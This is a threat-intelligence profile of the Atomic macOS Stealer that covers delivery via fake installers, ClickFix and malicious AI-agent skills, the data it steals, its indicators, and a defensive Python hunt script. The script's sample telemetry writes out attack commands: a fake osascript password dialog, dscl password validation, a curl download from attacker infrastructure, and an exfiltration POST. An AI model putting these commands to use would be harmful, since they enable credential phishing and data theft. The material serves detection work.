Atomic Stealer
Atomic macOS Stealer, also known as AMOS, Atomic Stealer, Atomic MacOS Stealer, and Shamos, is a macOS-focused information stealer sold or rented via Telegram and repeatedly observed in crimeware, malvertising, phishing, fake software installer, and paste-and-run/ClickFix delivery campaigns. It is distributed in DMG-based installers and fake application bundles impersonating legitimate software such as Tor Browser, Notion, Microsoft Office, Photoshop CC, TradingView-related tools, and Homebrew, and has also been embedded in malicious OpenClaw/ClawHub skills. Earlier campaigns commonly instructed victims to bypass Gatekeeper via right-click and Open; after Apple patched that bypass in October 2024, reporting indicates a shift toward ClickFix and Terminal paste-and-run social engineering.
AMOS is designed to steal sensitive data from macOS systems, especially browser and locally stored secrets. Reported capabilities include theft of browser credentials, cookies, session tokens, autofill data, stored payment card data, browser history, browser profile data, Keychain data including login.keychain-db, SSH keys, messaging app data, Apple Notes data, Safari cookies, user documents, and cryptocurrency wallet data. Targeted browsers mentioned across reporting include Chrome, Brave, Edge, Vivaldi, Opera, Arc, CocCoc, Yandex, Firefox and Firefox-derived browsers, and Safari. Targeted wallet applications and artifacts include Electrum, Binance, Exodus, Atomic Wallet, Coinomi, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Dogecoin Wallet, TonKeeper, and numerous cryptocurrency browser extensions. Some reports also note theft from Telegram Desktop and Discord, and replacement of Ledger Live and Trezor Suite with malicious versions.
Behaviorally, AMOS commonly uses AppleScript or osascript-driven fake macOS or System Preferences authentication dialogs to capture the victim’s local password, validating it in some variants with /usr/bin/dscl -authonly. Multiple reports describe a smash-and-grab model without persistence, though newer variants and related reporting note Python-assisted collection, anti-analysis checks for VMware, and in some cases overlap in tradecraft with RustDoor and similarities with Odyssey/Poseidon AppleScript logic. One Bitdefender-described variant drops an XOR-decoded Python script to /var/tmp/olx, collects browser, wallet, Safari cookie, system_profiler, and login.keychain-db data, and exfiltrates an in-memory ZIP archive via HTTP POST to /p2p on 5.42.65[.]114.
AMOS has been associated in reporting with Russian threat activity and has also been used by criminal ecosystems such as Crazy Evil. It has remained one of the most prevalent and popular macOS stealers through 2024 and 2025, frequently cited alongside Poseidon/Odyssey and Cthulhu as notable macOS threats.
High-confidence infrastructure and indicators cited in the underlying reporting include amos-malware[.]ru/sendlog, 37.220.87[.]16:5000/sendlog, 94.142.138[.]177/sendlog, 5.42.65[.]114/p2p, 91.92.242[.]30 and 91.92.242[.]30/lamq4, nextnovatech[.]com, wooofi[.]com, slackcomtop.aab-e-pak[.]com, slackforbusiness[.]net including /api.php and /main.php, macpaw[.]us, svs-verificationdate[.]beer, and 196.251.107[.]171.
Sample hashes and related indicators explicitly cited include the Setup.dmg SHA256 15f39e53a2b4fa01f2c39ad29c7fe4c2fef6f24eff6fa46b8e77add58e7ac709 and the following Sophos-listed AMOS sample hashes:
01082cd4733e5f3e2c3f642fa6c0afb5a9489d39ff26a35549263fc0e02ebad3
bda2503fc02b11258399cfabd0778a997654b5bd7d30e5e3f5bef54a74b914e1
c43e506c9b964dddf6fd784bf0cc78b4a2396f47257361dc22e1070e249eae16
4dce8b3beba71b8b44b6576ff2497ed68c6fafebd046822f0d60f8758238e900
564b21c293bc9d0885dc7a87dbf488a497c98d2103d91f5bbcfdb476eb8b6f4c
b351e3f475681ab2e8db5b2bbd2beaf26e5b4fd082ca08eba6fffbc76370113c
8891e7562eb4db253a8582376083ca99b19457680f9d36a5ba4108790740785e
716778bab5fb2c439a51362be5941a50d587714d58a6faa39eefa96aa79c1561
d23491dd351f43f0efad5cee2be80c4049349a7695c0e7de1de632c791356183
7bcfcc90d0bd6c85b5b1cc9f287e161020571a0418afb50f2dd67685e9d3a4fc
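The behaviours and indicators above translate directly into hunt logic. The following is an added example, not code from the profile page or from any vendor cited in it: a small Python script that applies the AMOS tradecraft described here (an osascript password prompt with a hidden answer, password validation with dscl -authonly, a quiet curl -fsSL download written under /tmp, the /var/tmp/olx drop path, and an HTTP POST to /p2p) together with the profile's infrastructure list to constructed sample telemetry. The event format, host names and command lines are assumptions made up for the example; the indicator values are the ones listed in this profile, written defanged with [.] as published IOC lists usually are, and the script refangs them before matching so that a copied list does not silently match nothing.

```python
"""Hunt for AMOS (Atomic macOS Stealer) tradecraft in constructed sample telemetry.

Added example for the profile above; not vendor or project code. Event schema,
host names and command lines are assumptions; indicator values come from the profile.
"""
import re
from dataclasses import dataclass

# Infrastructure copied from the profile, defanged with "[.]" as published.
INFRA_IOCS = [
    "amos-malware[.]ru",
    "37.220.87[.]16",
    "94.142.138[.]177",
    "5.42.65[.]114",
    "91.92.242[.]30",
    "svs-verificationdate[.]beer",
    "196.251.107[.]171",
    "slackforbusiness[.]net",
    "macpaw[.]us",
]


def refang(ioc: str) -> str:
    """Reverse common defanging so published IOCs match live log values."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


IOC_HOSTS = {refang(i) for i in INFRA_IOCS}

# Behavioural rules applied to a process command line: (rule name, regex).
PROCESS_RULES = [
    # Fake authentication dialog: AppleScript "display dialog ... with hidden answer".
    ("applescript_password_prompt",
     re.compile(r"osascript.*display dialog.*hidden answer", re.I | re.S)),
    # Captured password validated locally with dscl -authonly.
    ("dscl_authonly_password_check", re.compile(r"\bdscl\b.*-authonly")),
    # ClickFix paste-and-run: quiet curl download written under /tmp or /var/tmp.
    ("curl_silent_download_to_tmp",
     re.compile(r"\bcurl\b.*-fsSL.*(?:-o|>)\s*/(?:var/)?tmp/")),
    # Drop path of the Python collector described in the Bitdefender-reported variant.
    ("amos_python_drop_path", re.compile(r"/var/tmp/olx\b")),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    evidence: str


def host_of(dest: str) -> str:
    """Extract the host from a URL or 'host:port' string."""
    m = re.match(r"^(?:https?://)?([^/:]+)", dest)
    return m.group(1) if m else dest


def hunt(events):
    """Return one Finding per matching rule per event (process or network)."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            for name, rx in PROCESS_RULES:
                if rx.search(ev["cmdline"]):
                    findings.append(Finding(name, ev["host"], ev["cmdline"]))
        elif ev["type"] == "network":
            if host_of(ev["dest"]) in IOC_HOSTS:
                findings.append(Finding("known_amos_infrastructure", ev["host"], ev["dest"]))
            if ev.get("method") == "POST" and ev["dest"].endswith("/p2p"):
                findings.append(Finding("http_post_p2p_exfil_path", ev["host"], ev["dest"]))
    return findings


# Constructed sample telemetry (assumed schema): a mix of suspicious and benign events.
SAMPLE_EVENTS = [
    {"type": "process", "host": "mac-01",
     "cmdline": "osascript -e 'display dialog \"macOS wants to make changes\" "
                "default answer \"\" with hidden answer'"},
    {"type": "process", "host": "mac-01", "cmdline": "dscl . -authonly jdoe <redacted>"},
    {"type": "process", "host": "mac-02",
     "cmdline": "/bin/bash -c \"curl -fsSL https://svs-verificationdate.beer/x -o /tmp/Ab3xQ9\""},
    {"type": "network", "host": "mac-01", "method": "POST", "dest": "http://5.42.65.114/p2p"},
    {"type": "process", "host": "mac-03",
     "cmdline": "osascript -e 'display notification \"Build finished\"'"},   # benign
    {"type": "network", "host": "mac-03", "method": "GET", "dest": "https://api.github.com/repos"},
    {"type": "process", "host": "mac-01", "cmdline": "python3 /var/tmp/olx"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:8} {f.rule:32} {f.evidence}")
```

The network event for 5.42.65.114/p2p produces two findings (known infrastructure plus the exfiltration path), which is the intended behaviour: each rule is independent evidence, and an analyst triaging the output wants to see both. The curl rule deliberately requires the download to land under /tmp or /var/tmp rather than flagging every curl -fsSL, since that flag combination is common in legitimate install scripts.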
Vulnerabilities exploited
2 CVEs correlated with this family across public research and vendor advisories.
"A critical remote code execution (RCE) vulnerability, identified as CVE-2025-55182 and dubbed React2Shell, exists within the React Server Components (RSC) architecture, allowing unauthenticated attackers to execute arbitrary code..."
The campaign coincides with the disclosure of a high-severity OpenClaw vulnerability (CVE-2026-25253) that enables one-click remote code execution through token exfiltration and WebSocket hijacking. Although patched in late January 2026, the flaw points to the platform’s growing attack surface.
Groups observed using it
6 distinct threat actors attributed by public researchers.
A separate skill called omnicogg embedded the AMOS malware dropper inside a README.md file, then padded it with 22 MB of junk characters to exceed file size limits that most scanning pipelines enforce.
The campaign is infecting Mac devices with the Atomic macOS Stealer (AMOS) infostealer, which steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.
Diversified Malware Toolkit: Crazy Evil uses advanced tools like Stealc and AMOS for Windows and macOS, ensuring widespread compromise.
Odyssey isn’t original work. It’s a direct rebrand of Poseidon Stealer, which itself was forked from Atomic macOS Stealer (AMOS).
Two new AMOS (Atomic macOS Stealer) samples uploaded to MalwareBazaar reveal a significant evolution of the macOS stealer family.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance (1 technique)
Resource Development (2 techniques)
Initial Access (1 technique)
Execution (5 techniques)
These skills deployed infostealers, reverse shells and the Atomic macOS Stealer malware, exfiltrating browser credentials, keychains, SSH keys and crypto wallets.
...both being Go-based infostealers that also use osascript to display error messages to the user on execution...
After running the Terminal command, the attack downloads a malicious DMG from svs-verificationdate[.]beer using curl with the quiet "-fsSL" flags and saves it to the /tmp folder under a random filename.
The campaign begins with a fake CAPTCHA page that tells users to open Terminal and paste a malicious command to verify themselves.
OpenClaw is an AI agent that runs third-party skills sourced from ClawHub, a dedicated marketplace. These skills are markdown-driven packages with deep access to local systems. When a malicious skill is installed, it can seize full control of the agent’s identity and execute unauthorized actions through the agent’s own authenticated sessions.
Stealth (4 techniques)
Each of these skills mimicked a legitimate tool. The TradingView skills appeared to be trader productivity aids, and omnicogg passed for a general utility.
Defense Impairment (1 technique)
Credential Access (7 techniques)
Atomic does not attempt to gain persistence... Atomic Stealer uses a crude but effective means of extracting the user’s login password via AppleScript spoofing.
The TA also provides additional services such as a web panel for managing victims, meta mask brute-forcing for stealing seed and private keys...
It steals cookies, login databases, autofill information, stored payment cards, and browser profile data.
In addition to obtaining the system password, the malware also targets the password management tool by utilizing the main_keychain() function to extract sensitive information from the victim’s machine.
Discovery (2 techniques)
Collection (3 techniques)
The malware also steals Telegram Desktop and Discord data, Apple Notes databases, Safari cookies, Apple Keychain database files, and user documents with the PDF, TXT, or RTF extensions.
IOCs tracked for this family
436 indicators attributed across vendor reports, sandbox runs, and researcher write-ups: IPs, domains, and DNS infrastructure; file hashes (MD5, SHA-1, SHA-256) from samples and reports; and other indicator types observed in public reporting.
Recent activity
161 sources tracked across advisories, community write-ups, and news.
AMOS is described here as a malware dropper embedded in a malicious skill and concealed with file-padding to evade marketplace scanning limits.
A macOS-focused infostealer distributed via malicious OpenClaw skills on the ClawHub marketplace.
A macOS stealer previously documented harvesting login.keychain-db and browser data.
A macOS infostealer delivered via malicious OpenClaw/ClawHub skills, including Base64-encoded curl-pipe-bash droppers and persistent auto-updater mechanisms communicating with C2 infrastructure.